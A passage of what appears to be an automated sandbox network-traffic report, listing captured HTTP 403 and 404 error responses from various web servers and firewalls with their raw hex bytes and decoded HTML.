0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:20 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zqEDp1EPkloxW95BGdV23YR0ix9vYX5FNCkzGJF2CBwDzQFty%2FLDehuFgk4CYr%2Bara82f09XcEQpMk507ydfRCOscedT3%2BJAI4UlRRAgcE0anBpdDPWdF1F9RJlnWhkn"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc76159889b98-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:20 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfUULPX/0mKWXsvRp6aPYGx,qquldgcFrj2n046g4RNSVMxfheUO4XmnqrwYf15pULU=X-Wix-Request-Id: 1679460260.06527021762216585X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:20 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cOBIQSafe3LDgiVPhqwjcAAbwZiCI51RzR91QcV0bU3b6qvksVGcJZzHO6Jp3%2FZAHJ5OC9b13HcCSA%2FeVFkcbQpJpdM7GdfX5HSD8dgOC053vQgm85m5Lyt2GIq7UqJN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc7618a029b98-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:21 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:21 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:22 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:44:25 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:26 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 22 Mar 2023 04:44:34 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 22 Mar 2023 04:44:26 GMTContent-Type: text/html; charset=utf-8Content-Length: 148Connection: keep-aliveX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffX-Kong-Upstream-Latency: 2X-Kong-Proxy-Latency: 0Via: kong/1.4.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 4f 53 54 20 2f 70 61 72 6b 69 6e 67 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot POST /parking/</pre></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:27 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:44:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 22 Mar 2023 04:44:42 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Nx0KVIJDwK8FuA6T71Odf5Ckncisjm3pJzgDi6VamjWQ3ANFrcHli01eGth1NLQAta%2F3tMbZ5idamtNKRunYV19vt6TWxRmfZNYQcbZIsQn78G7QUzSmg8uq8LmnkQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc78d6d178ff5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 31 61 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 Data Ascii: 11a3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:27 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 